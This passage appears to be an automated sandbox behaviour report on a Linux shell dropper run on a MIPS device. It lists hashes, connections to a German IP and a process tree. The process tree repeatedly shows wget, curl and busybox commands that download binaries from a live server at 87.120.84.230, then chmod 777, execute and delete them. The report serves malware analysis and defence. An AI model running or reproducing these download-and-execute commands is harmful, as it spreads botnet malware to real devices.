[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/rm
[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/820-1-0xb6705000-0xb6716044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:26
Reported
2024-10-25 01:29
Platform
debian9-mipsbe-20240611-en
Max time kernel
67s
Max time network
68s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
Processes
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/chmod
[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/rm
[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/wget
[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/chmod
[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO
[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/rm
[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/wget
[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/chmod
[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S
[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/rm
[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/wget
[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/chmod
[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME
[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/rm
[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/wget
[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/chmod
[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV
[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/rm
[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/wget
[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/chmod
[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH
[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/rm
[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/chmod
[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal
[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/rm
[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/wget
[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/chmod
[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V
[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/rm
[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/wget
[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/chmod
[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS
[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/rm
[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/wget
[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/chmod
[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm
[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/rm
[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/wget
[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/chmod
[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ
[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/rm
[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/wget
[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/chmod
[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv
[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/rm
[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/chmod
[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8
[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/rm
[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/wget
[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/chmod
[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj
[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/rm
[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/wget
[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/chmod
[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm
[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/rm
[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/wget
[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/chmod
[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ
[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/rm
[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/wget
[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/chmod
[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv
[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/rm
[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/chmod
[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8
[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/rm
